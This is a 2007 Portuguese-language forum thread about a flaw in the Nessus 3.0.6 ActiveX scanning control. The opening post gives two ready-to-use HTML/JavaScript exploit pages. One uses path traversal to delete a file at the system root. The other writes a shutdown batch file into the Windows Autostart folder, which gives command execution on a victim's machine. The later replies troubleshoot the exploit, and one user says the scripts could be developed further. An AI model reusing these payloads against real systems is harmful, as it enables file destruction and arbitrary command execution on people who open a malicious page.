Title: [Vulnerabilidade] Nessus 3.0.6
Post by: HadeS on 06 de August , 2007, 11:30:57 AM
Post by: HadeS on 06 de August , 2007, 11:30:57 AM
Uma falha no Nessus permite que usuários mal intencionados rodem comandos por controles ActiveX no computador da vítima.
A falha está em: Nessus SCANCTRL.ScanCtrlCtrl.1 ActiveX Control
Veja um exemplo de código para exploração:
Um outro exemplo:
O primeiro exemplo irá excluir o arquivo test.txt na raíz do sistema, o segundo acho que não preciso nem falar.
HadeS
A falha está em: Nessus SCANCTRL.ScanCtrlCtrl.1 ActiveX Control
Veja um exemplo de código para exploração:
Code Select
<HTML>
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
<script language="javascript">
obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt
alert("done");
</script>
</HTML>Um outro exemplo:
Code Select
<HTML>
<object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object>
<script language="javascript">
obj.addsetConfig('shutdown -t 1000 -s -c "hello world ;]" && pause', '', '');
obj.saveNessusRC("../../../../../../Documents and Settings/All Users/Menu Start/Programy/Autostart/exec.bat");
</script>
</HTML>O primeiro exemplo irá excluir o arquivo test.txt na raíz do sistema, o segundo acho que não preciso nem falar.
HadeS
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Be.Cool on 06 de August , 2007, 01:46:49 PM
Post by: Be.Cool on 06 de August , 2007, 01:46:49 PM
Orra muito loko!
da pra dar uma implementada legal nesses script!
vlw
fui.
da pra dar uma implementada legal nesses script!
vlw
fui.
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Anonymous on 06 de August , 2007, 04:21:41 PM
Post by: Anonymous on 06 de August , 2007, 04:21:41 PM
[O primeiro exemplo irá excluir o arquivo test.txt na raíz do sistema, o segundo acho que não preciso nem falar.]
HadeS,
Neste trecho do primeiro código, vc substituiu as barras por diretórios ou deixou assim, porque comigo não aconteceu nada.
obj.deleteReport("../../../../../../../test.txt");
HadeS,
Neste trecho do primeiro código, vc substituiu as barras por diretórios ou deixou assim, porque comigo não aconteceu nada.
obj.deleteReport("../../../../../../../test.txt");
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Be.Cool on 06 de August , 2007, 04:59:45 PM
Post by: Be.Cool on 06 de August , 2007, 04:59:45 PM
@DARK BOMBER
Não precisa colocar os diretorios porque o ../ significa que vc vai descer um diretorio
ou seja se vc colocar varios ../ vc vai chegar na raiz do sistema onde vc devia ter colocado o test.txt
fui.
Não precisa colocar os diretorios porque o ../ significa que vc vai descer um diretorio
ou seja se vc colocar varios ../ vc vai chegar na raiz do sistema onde vc devia ter colocado o test.txt
fui.
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Anonymous on 06 de August , 2007, 05:03:31 PM
Post by: Anonymous on 06 de August , 2007, 05:03:31 PM
Pois é, foi assim que eu testei e não deu certo, por isso que eu tava achando
que tinha que mudar os diretórios.
Criei um arquivo qualquer no disco C: com o nome test.txt , em seguida abri o primeiro código no browser e não aconteceu nada com o arquivo no disco c:.
que tinha que mudar os diretórios.
Criei um arquivo qualquer no disco C: com o nome test.txt , em seguida abri o primeiro código no browser e não aconteceu nada com o arquivo no disco c:.
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Be.Cool on 06 de August , 2007, 05:40:01 PM
Post by: Be.Cool on 06 de August , 2007, 05:40:01 PM
vc tem o nessus?
vc deixou ele executando?
fui.
vc deixou ele executando?
fui.
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Anonymous on 06 de August , 2007, 06:37:54 PM
Post by: Anonymous on 06 de August , 2007, 06:37:54 PM
Não, não tenho o nessus.
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: HadeS on 06 de August , 2007, 07:39:24 PM
Post by: HadeS on 06 de August , 2007, 07:39:24 PM
Huahauhauauahuahau...
A falha está no Nessus cara, como quer ser explorado sem ter ele instalado?
lol
HadeS
A falha está no Nessus cara, como quer ser explorado sem ter ele instalado?
lol
HadeS
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Anonymous on 06 de August , 2007, 10:16:33 PM
Post by: Anonymous on 06 de August , 2007, 10:16:33 PM
Você tem ele disponível pra gente?
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Dri.vicaria on 06 de August , 2007, 10:51:00 PM
Post by: Dri.vicaria on 06 de August , 2007, 10:51:00 PM
Êta preguiça.........http://www.nessus.org/ (//http://www.nessus.org/)
Pô, rapaz, é o mais famoso scanner de vulnerabilidade...com Linux, of corse !!!! ;)
Bjs,
Dri
Pô, rapaz, é o mais famoso scanner de vulnerabilidade...com Linux, of corse !!!! ;)
Bjs,
Dri
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Anonymous on 06 de August , 2007, 11:05:17 PM
Post by: Anonymous on 06 de August , 2007, 11:05:17 PM
É que o nessus eu não conhecia.
tô baixando!
brigado.
tô baixando!
brigado.
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Anonymous on 07 de August , 2007, 12:02:46 AM
Post by: Anonymous on 07 de August , 2007, 12:02:46 AM
Desculpa pelo duplo post, é que usei o nessus e acho que ele abriu 4 portas aki, tem como fechar?
Ele é poderoso!
Ele é poderoso!
Title: Re: [Vulnerabilidade] Nessus 3.0.6
Post by: Be.Cool on 19 de August , 2007, 07:55:53 PM
Post by: Be.Cool on 19 de August , 2007, 07:55:53 PM
@dark bomber
vc pode bloquea-lo pelo firewall ou baixa o porgrama tcp list do Dark_Side que fecha a porta que vc quiser =)
vlw
fui.
vc pode bloquea-lo pelo firewall ou baixa o porgrama tcp list do Dark_Side que fecha a porta que vc quiser =)
vlw
fui.